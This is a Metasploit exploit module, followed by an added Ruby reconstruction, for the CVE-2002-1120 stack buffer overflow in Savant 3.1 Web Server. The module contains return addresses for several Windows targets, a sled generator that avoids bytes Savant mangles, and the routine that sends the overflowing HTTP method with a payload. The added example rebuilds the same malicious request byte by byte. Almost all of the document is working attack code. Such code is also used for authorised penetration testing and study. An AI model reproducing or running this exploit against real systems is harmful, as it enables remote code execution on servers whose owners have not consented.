##
# $Id: savant_31_overflow.rb 10546 2010-10-04 20:53:51Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	HttpFingerprint = { :pattern => [ /Savant\/3\.1/ ] }

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Savant 3.1 Web Server Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Savant 3.1 Web Server.
				The service supports a maximum of 10 threads (for a default install).
				Each exploit attempt generally causes a thread to die whether successful
				or not. Therefore, in a default configuration, you only have 10 chances.
				Due to the limited space available for the payload in this exploit module,
				use of the "ord" payloads is recommended.
			},
			'Author'         => [ 'patrick' ],
			'Arch'           => [ ARCH_X86 ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10546 $',
			'References'     =>
				[
					[ 'CVE', '2002-1120' ],
					[ 'OSVDB', '9829' ],
					[ 'BID', '5686' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/787' ],
				],
			'Privileged'     => false,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'           => 253,
					'BadChars'        => "\x00\x0a\x0d\x25",
					'StackAdjustment' => -3500,
					'Compat'          =>
						{
							'ConnectionType' => '+ws2ord',
						},
				},
			'Platform'       => ['win'],
			'Targets'        =>
				[
					# Patrick - Tested OK 2007/08/08 : w2ksp0, w2ksp4, xpsp2 en.
					[ 'Universal Savant.exe',           { 'Ret' => 0x00417a96 } ], # p/r Savant.exe
					[ 'Windows 2000 Pro All - English', { 'Ret' => 0x750211aa } ], # p/r ws2help.dll
					[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2ac5 } ], # p/r ws2help.dll
					[ 'Windows 2000 Pro All - French',  { 'Ret' => 0x74fa36b2 } ], # p/r ws2help.dll
					[ 'Windows XP Pro SP2 - English',   { 'Ret' => 0x71ab76ed } ], # p/r ws2help.dll
				],
			'DisclosureDate' => 'Sep 10 2002',
			'DefaultTarget'  => 0))
	end

	def check
		info = http_fingerprint # check method

		if info and (info =~ /Savant\/3\.1/)
			return Exploit::CheckCode::Vulnerable
		end
		Exploit::CheckCode::Safe
	end

	def safe_nops(count)
		# We need to find a safe nop combination.
		# Savant will change some chars in the http method type - anything before the "/".
		#
		# For example, "GET /" will remain "GET /", however
		# "\xe0 /" will be modified to "\xc0 /" ...
		# "\xfe /" will be modified to "\xde /" ...
		# "\xff /" will be modified to "\x9f /"
		# The code after the "/" - our payload - is unchanged >=)
		#
		# Savant bad_chars for the nops
		bad_nop_chars = [*(0xe0..0xff)].pack("C*")
		nopsled = make_nops(count) # make_nops includes the payload bad_chars

		bad_nop_chars.each_byte { |badbyte|
			nopsled.each_byte { |goodbyte|
				if (goodbyte == badbyte)
					return false
				end
			}
		}
		return nopsled
	end

	def exploit
		print_status("Searching for a suitable nopsled...")

		findnop = safe_nops(24) # If we use short jump or make_nops(), sled will be corrupted.
		until findnop
			findnop = safe_nops(24) # If nops are banned, generate a new batch.
		end

		print_status("Found one! Sending exploit.")

		sploit = findnop + " /" + payload.encoded + [target['Ret']].pack('V')

		res = send_request_raw({
			'method' => sploit,
			'uri'    => '/'
		}, 5)

		if (res)
			print_error('The server responded, that can\'t be good.')
		end

		handler
	end
end
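The layout the module sends, and the two independent byte filters its nop sled has to pass, as an added stand-alone Ruby example. This is not code from the Metasploit module or from Savant: the NOP_EQUIVALENTS table is an assumed small subset of what make_nops draws from, the payload bytes and the HTTP/1.1 request line are constructed here, and the padding of the payload up to 'Space' (which Metasploit does to payload.encoded) is reproduced explicitly so the return-address offset is visible.

```ruby
# Added example, not part of the Metasploit module or the Savant project.
# Models the method-field overflow the module sends and the two badchar
# filters its sled must satisfy; sample payload and tables are constructed.

PAYLOAD_SPACE    = 253                                # 'Space' in the module
PAYLOAD_BADCHARS = "\x00\x0a\x0d\x25".bytes.freeze    # 'BadChars' in the module
# Savant rewrites bytes 0xe0..0xff that sit before the first "/" (the method
# position), so a sled placed there must avoid them as well.
METHOD_BADCHARS  = (0xe0..0xff).to_a.freeze
SLED_LEN         = 24                                 # safe_nops(24) in the module

# Single-byte x86 instructions that are harmless in a sled (assumption: a small
# subset of what Metasploit's make_nops draws from). The last three fall in
# 0xe0..0xff on purpose, so the method-position filter has work to do.
NOP_EQUIVALENTS = [0x90,                              # nop
                   0x40, 0x41, 0x42, 0x43,            # inc eax/ecx/edx/ebx
                   0x46, 0x47, 0x48, 0x49,            # inc esi/edi, dec eax/ecx
                   0x4a, 0x4b, 0x4e, 0x4f,            # dec edx/ebx/esi/edi
                   0x98,                              # cwde
                   0xf8, 0xf9, 0xfc].freeze           # clc, stc, cld

# True if any byte of +bytes+ (an Array of Integers) is in +badchars+.
def contains_badchars?(bytes, badchars)
  (bytes & badchars).any?
end

# One random sled, the way make_nops would build it: only the payload
# badchars are honoured at this stage.
def random_sled(len, rng)
  pool = NOP_EQUIVALENTS - PAYLOAD_BADCHARS
  Array.new(len) { pool[rng.rand(pool.size)] }
end

# The module's safe_nops/until loop: keep drawing sleds until one also avoids
# the bytes Savant mangles in the method position. Returns an Array of bytes.
def safe_sled(len, rng, max_tries = 10_000)
  max_tries.times do
    sled = random_sled(len, rng)
    return sled unless contains_badchars?(sled, METHOD_BADCHARS)
  end
  raise "no sled free of method badchars after #{max_tries} tries"
end

# Assemble the oversized "method" field: sled, " /", the payload padded to
# PAYLOAD_SPACE with 0x90 (Metasploit pads payload.encoded to 'Space'; assumed
# here and done explicitly), then the little-endian return address.
def build_method(sled, payload, ret)
  raise ArgumentError, "payload too large"          if payload.bytesize > PAYLOAD_SPACE
  raise ArgumentError, "payload contains badchars"  if contains_badchars?(payload.bytes, PAYLOAD_BADCHARS)
  raise ArgumentError, "sled contains method badchars" if contains_badchars?(sled, METHOD_BADCHARS)
  padded = payload.b + ("\x90" * (PAYLOAD_SPACE - payload.bytesize)).b
  sled.pack("C*") + " /".b + padded + [ret].pack("V")
end

# Offset of the return address from the start of the method field.
def ret_offset(sled_len = SLED_LEN)
  sled_len + 2 + PAYLOAD_SPACE
end

# The request line as send_request_raw would emit it with 'uri' => '/'
# (assumption: HTTP/1.1 and a bare CRLF CRLF terminator, no extra headers).
def build_request(method_field)
  method_field + " / HTTP/1.1\r\n\r\n".b
end

if __FILE__ == $0
  rng     = Random.new(1)
  sled    = safe_sled(SLED_LEN, rng)
  payload = "\xcc" * 40           # constructed stand-in, not real shellcode
  ret     = 0x00417a96            # 'Universal Savant.exe' target from the module
  req     = build_request(build_method(sled, payload, ret))
  puts "sled:       #{sled.map { |b| '%02x' % b }.join(' ')}"
  puts "ret offset: #{ret_offset}"
  puts "request:    #{req.bytesize} bytes"
end
```

The point the two filters make is that a sled which is fine for the payload can still be rewritten by Savant because it sits before the "/"; that is why the module loops on safe_nops rather than trusting make_nops once. build_method rejects an oversized or badchar-bearing payload up front, since on this target each failed attempt burns one of the ten worker threads.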